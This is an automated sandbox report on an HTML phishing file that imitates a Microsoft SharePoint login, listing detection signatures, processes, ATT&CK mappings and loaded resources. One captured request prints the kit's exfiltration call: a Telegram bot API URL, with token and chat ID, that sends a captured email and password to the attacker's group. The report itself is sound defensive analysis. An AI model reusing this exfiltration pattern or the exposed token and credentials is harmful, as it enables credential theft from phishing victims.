Windows Analysis Report
ScannedFileCopy8475.html

Overview

General Information

Sample Name:ScannedFileCopy8475.html
Analysis ID:831537
MD5:9a580f2e9f88aad5f60b02d775596e37
SHA1:f9b1a8953113077f96acb4264754e94964d14d43
SHA256:f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
HTML document with suspicious name
Phishing site detected (based on image similarity)
Invalid 'forgot password' link found
HTML body contains low number of good links
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
Source: 28499.0.pages.csv | Rule: JoeSecurity_HtmlPhish_10 | Description: Yara detected HtmlPhish_10 | Author: Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: ScannedFileCopy8475.html | Virustotal: Detection: 13%

    Phishing

    Source: Yara match | File source: 28499.0.pages.csv, type: HTML
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | Matcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: Invalid link: Forgot password?
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | HTTP Parser: No <meta name="copyright".. found
    Source: chrome.exe | Memory has grown: Private usage: 8MB later: 24MB
    Source: unknown | DNS traffic detected: queries for: clients2.google.com

    System Summary

    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | Tab title: Sharepoint
    Source: Name includes: ScannedFileCopy8475.html | Initial sample: scanned
    Source: ScannedFileCopy8475.html | Virustotal: Detection: 13%
    Source: classification engine | Classification label: mal68.phis.winHTML@23/70@6/116
    Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE | File Volume queried: C:\Windows\System32 FullSizeInformation
    • Initial Access: Valid Accounts; Default Accounts; Domain Accounts
    • Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux)
    • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
    • Privilege Escalation: 1 Process Injection; 1 Extra Window Memory Injection; Logon Script (Windows)
    • Defense Evasion: 1 Process Injection; 1 Extra Window Memory Injection; Obfuscated Files or Information
    • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
    • Discovery: 1 System Information Discovery; Application Window Discovery; Query Registry
    • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
    • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
    • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
    • Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
    • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
    • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    • Impact: Modify System Partition; Device Lockout; Delete Device Data

    Source: ScannedFileCopy8475.html | Detection: 14% | Scanner: Virustotal
    No Antivirus matches
                        Name: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html | Malicious: true | Reputation: low
                        Joe Sandbox Version:37.0.0 Beryl
                        Analysis ID:831537
                        Start date and time:2023-03-21 15:41:20 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:1
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Sample file name:ScannedFileCopy8475.html
                        Detection:MAL
                        Classification:mal68.phis.winHTML@23/70@6/116
                        Cookbook Comments:
                        • Found application associated with file extension: .html
                        • Exclude process from analysis (whitelisted): SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 142.250.185.163, 34.104.35.123
                        • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: cs1227.wpc.alphacdn.net
                        • VT rate limit hit for: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html
                        • VT rate limit hit for: part-0017.t-0009.fdv2-t-msedge.net
                        File Type:data
                        Category:dropped
                        Size (bytes):12582
                        Entropy (8bit):3.3663352620841924
                        Encrypted:false
                        SSDEEP:
                        MD5:D4723DB381C386E8CDFC08095E805DC8
                        SHA1:A8EF4CAD168FE10767D768317CE8AE8B39D23A1E
                        SHA-256:DA791FF776D329234D63DCEEC4C2E94EDAC460E382F5F2D5F789C32E9265C372
                        SHA-512:622F96E3526D3E5E629EEDBF0057EF931A94598BCFD7510B3B3044FC115F32CAF05B59D035CDA224382B9674C465B6BD910259AF7C9D2428C81F9CF4CA674FF4
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):1057
                        Entropy (8bit):7.6851406288304105
                        Encrypted:false
                        SSDEEP:
                        MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                        SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                        SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                        SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:SVG Scalable Vector Graphics image
                        Category:dropped
                        Size (bytes):513
                        Entropy (8bit):4.720499940334011
                        Encrypted:false
                        SSDEEP:
                        MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                        SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                        SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                        SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                        Malicious:false
                        Reputation:low
                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                        Category:downloaded
                        Size (bytes):673
                        Entropy (8bit):7.6596900876595075
                        Encrypted:false
                        SSDEEP:
                        MD5:0E176276362B94279A4492511BFCBD98
                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                        Malicious:false
                        Reputation:low
                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                        Category:downloaded
                        Size (bytes):132196
                        Entropy (8bit):5.372671085317282
                        Encrypted:false
                        SSDEEP:
                        MD5:9053B729DEEF9E0A3952B298C993E251
                        SHA1:776A9D792B8C38AD537A563D2E716D65AD5963E7
                        SHA-256:555AAF0A4DAACE8F2D49EE1FF0428C7AE3CE4CE229E88EDE1A0C6217FFB2B80C
                        SHA-512:E23075E3BB108CC16B29A4A1337BB6CCA56D17434D2CD2643408C0DEE89DAC800BF517FA702D712ED42EDE0E114B878629EC0BDC29D01C3AF81BA2B4B9ADE224
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/css
                        Preview:@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}.HeaderUIFont{font-size:10pt;font-family:'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif;font-weight:300}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.FooterUIFont{font-size:9pt;font-family:'wf_segoe-ui_semilight','wf_sego
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:RIFF (little-endian) data, Web/P image
                        Category:downloaded
                        Size (bytes):31578
                        Entropy (8bit):7.982885431692689
                        Encrypted:false
                        SSDEEP:
                        MD5:ED7F9B571326AD6E974C9A21B2881D31
                        SHA1:6318ABCD8BE002C892FD9B306033C64FCE809B96
                        SHA-256:852C1EC9D3CEA82ACE52632CDE6A2EB44BA95B1281DCD725D5FBFECD564DA98E
                        SHA-512:0E141B50598EA78FD00E7706BE48CCCA3DDD7F44108B42FB217D080B834D61A89B4E3F0D52121A5277F3D39537876AE8B6CCA4E5F55A55CC9CF32ACB86D58B30
                        Malicious:false
                        Reputation:low
                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):694
                        Entropy (8bit):5.557161696687906
                        Encrypted:false
                        SSDEEP:
                        MD5:6CE3CBCFB4A0C8CBFB3E834D3D2BC442
                        SHA1:3783BB87A681DD57D4B2BE28BD65D160B8808086
                        SHA-256:51909580061BDE8E9CE89F714D384DFC666C7C7E049BEECFA6C962FBF5074EDD
                        SHA-512:FF96850DDCB3FF13BEA51E5A84D099BCE21A39484A81E5C900C54EE3C0935F519B65AA33DD4452121069F94A3819FF514EB93FBD1BB8BFDF8729710BB2F03ABC
                        Malicious:false
                        Reputation:low
                        URL:"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[2]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemper233"
                        Preview:{"ok":true,"result":{"message_id":283,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409841,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[2] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temper233","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (63888), with no line terminators
                        Category:downloaded
                        Size (bytes):279220
                        Entropy (8bit):6.058071014041615
                        Encrypted:false
                        SSDEEP:
                        MD5:5F524E20CE61F542125454BAF867C47B
                        SHA1:7E9834FD30DCFD27532CE79165344A438C31D78B
                        SHA-256:C688D3F2135B6B51617A306A0B1A665324402A00A6BCEBA475881AF281503AD9
                        SHA-512:224A6E2961C75BE0236140FED3606507BCA49EB10CB13F7DF2BCFBB3B12EBECED7107DE7AA8B2B2BB3FC2AA07CD4F057739735C040EF908381BE5BC86E0479B2
                        Malicious:false
                        Reputation:low
                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e,a,n){i.o(e,a)||Object.defineProperty(e,a,{enumerable:!0,get:n})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,a){if(1&a&&(e=i(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var o in e)i.d(n,o,function(a){return e[a]}.bind(null,o));return n},i.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(a,"a",a),a},i.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},i.p="",i(i.s=3)}([function(e,a,i)
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65451)
                        Category:downloaded
                        Size (bytes):89476
                        Entropy (8bit):5.2896589255084425
                        Encrypted:false
                        SSDEEP:
                        MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                        SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                        SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                        SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                        Malicious:false
                        Reputation:low
                        URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.1.min.js
                        Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2867), with no line terminators
                        Category:downloaded
                        Size (bytes):2872
                        Entropy (8bit):5.2233300794694175
                        Encrypted:false
                        SSDEEP:
                        MD5:815BE08F616A5FBC214EF097B9C63008
                        SHA1:20CF7874FD54C8665EC8144628FB033D76E8067C
                        SHA-256:0F60BF1F176081D7C33C63523B457692F7A7FA8EDCD5D0D16B0CE4E8680ECCBD
                        SHA-512:BA0269C6ABE139394D12054A157DBD76BA76148C7B8F0362EBADB1D27254CF7A6B2F040BA79BD8C6BB7F09FD22D6D549344003524C6CCA35623CC53AC494AE9D
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/css/TopNav/top-nav.css?v=y3fVhNR8laayLSfo-P3Q-CBl74RjRTQT6GeXgXCLJoc
                        Preview:.@font-face{font-family:"Support MDL2 Assets";src:url("../Glyphs/SupMDL2_v4_69.woff2") format("woff2"),url("../Glyphs/SupMDL2_v4_69.woff") format("woff")}#topNav{font-family:"Segoe UI","Segoe UI Web","Segoe WP","wf_segoe-ui_normal",Helvetica,Tahoma,Arial,sans-serif;font-weight:normal;font-size:13px}#topNav *{box-sizing:border-box}#topNav .topNavDropdownMenu{display:none;font-size:13px;display:none;left:0;position:absolute;right:0;z-index:1000;width:260px;padding-top:10px;padding-bottom:10px}#topNav .topNavDropdownMenu.activeMenu{display:block;width:fit-content}#topNav a[data-bi-name^=MNU_]{font-weight:bold}#topNav a.topNavDropdownTrigger{padding:11.5px 18px}#topNav .topNav{font-size:13px}#topNav .topNavDropdownMenuItem a{font-size:13px}#topNav .topNavDropdownMenuItem:hover{background-color:#cecece}#topNav .topNavActiveCategory>.topNavDropdownTrigger{font-size:13px;color:#1e1e1e;position:relative;z-index:1001}#topNav .topNavCategory{display:inline-block;position:relative}#topNav .topN
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (4873), with no line terminators
                        Category:downloaded
                        Size (bytes):4873
                        Entropy (8bit):5.2268236765669895
                        Encrypted:false
                        SSDEEP:
                        MD5:ED927CF0F8A1BE103DF48446270416EE
                        SHA1:F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
                        SHA-256:EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
                        SHA-512:FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
                        Preview:.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (342), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):1531
                        Entropy (8bit):4.797455242405607
                        Encrypted:false
                        SSDEEP:
                        MD5:A570448F8E33150F5737B9A57B6D889A
                        SHA1:860949A95B7598B394AA255FE06F530C3DA24E4E
                        SHA-256:0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
                        SHA-512:217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
                        Malicious:false
                        Reputation:low
                        URL:https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
                        Preview:a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 (with BOM) text
                        Category:downloaded
                        Size (bytes):23427
                        Entropy (8bit):5.112735417225198
                        Encrypted:false
                        SSDEEP:
                        MD5:BA0537E9574725096AF97C27D7E54F76
                        SHA1:BD46B47D74D344F435B5805114559D45979762D5
                        SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                        SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                        Malicious:false
                        Reputation:low
                        URL:https://www.w3schools.com/w3css/4/w3.css
                        Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (1576), with no line terminators
                        Category:downloaded
                        Size (bytes):1576
                        Entropy (8bit):5.141392770238462
                        Encrypted:false
                        SSDEEP:
                        MD5:505830644E0EEB03349C0142A5C96376
                        SHA1:2D773975C260209FCFBBBB21FF12E23BE237F1B7
                        SHA-256:9A2DACAA69B83B0479BF5C531E5601D7896361456480AA2399349A966030B8BB
                        SHA-512:61CACBA8877890AE418F81302C5F72216AF0D95E2F355363C508383BCDEFD22C142E21310C1D5E2A83AD3E8E0BE9071952214D73A966D5528440FA3D5AB05414
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/officeShared
                        Preview:html,body{height:auto}h2.ocExpandoHead,.ocExpandoBody p{font-family:'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead.macexcel,.ocExpandoBody p.macexcel,h2.ocExpandoHead.maconenote,.ocExpandoBody p.maconenote,h2.ocExpandoHead.macoutlook,.ocExpandoBody p.macoutlook,h2.ocExpandoHead.macpowerpoint,.ocExpandoBody p.macpowerpoint,h2.ocExpandoHead.macword,.ocExpandoBody p.macword{font-family:-apple-system,'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead{border-top:solid 1px #cecece;cursor:pointer;font-size:18px;margin-top:0}h2.ocExpandoHead span{font-size:5px}h2.ocExpandoHead:first-child{border-top:none}h2.ocExpandoHead.opened{background-position-y:69%}h2.ocExpandoHead a{text-decoration:none;padding-top:13px;padding-bottom:12px;display:block}div.ocExpandoBody{display:none}div.ocExpandoBody>p{margin-top:0;padding-left:26px}div.ocExpandoBody p a{color:#2c71b8;font-size
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):694
                        Entropy (8bit):5.553630599268126
                        Encrypted:false
                        SSDEEP:
                        MD5:BDD40483974AD0A4EABD106667CAD329
                        SHA1:4F293784FEFAE7F5009A3BEC7C3A9443FC48695E
                        SHA-256:BD84968C122D3784985132217E28E9809E423ED6BD71214A320553A730C5B188
                        SHA-512:BBF049906778387726D8C2B772110250C87E85573CE3B707E771453A4025C8D8AE5AD955FB5CE3190275868C9D940AB5E64639271FE6BB51F4710517881C3197
                        Malicious:false
                        Reputation:low
